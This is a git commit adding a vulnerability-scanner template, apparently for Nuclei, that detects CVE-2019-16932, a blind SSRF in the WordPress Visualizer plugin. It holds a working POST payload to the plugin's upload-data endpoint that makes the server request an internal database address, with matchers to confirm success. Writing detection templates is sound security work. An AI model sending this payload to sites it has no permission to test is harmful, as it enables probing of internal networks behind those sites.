Create CVE-2019-16932.yaml
parent
5d0f8a724e
commit
e9ade82de7
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2019-16932
|
||||
|
||||
info:
|
||||
name: Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF)
|
||||
author: akincibor
|
||||
severity: high
|
||||
description: |
|
||||
This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/9892
|
||||
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-16932
|
||||
metadata:
|
||||
verified: true
|
||||
tags: wp-plugin,ssrf,wordpress,wp,xss,unauth
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/wp-json/visualizer/v1/upload-data'
|
||||
body: '{\"url\":\"http://db:3306\"}'
|
||||
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- 'db_1'
|
||||
part: body
|
Loading…
Reference in New Issue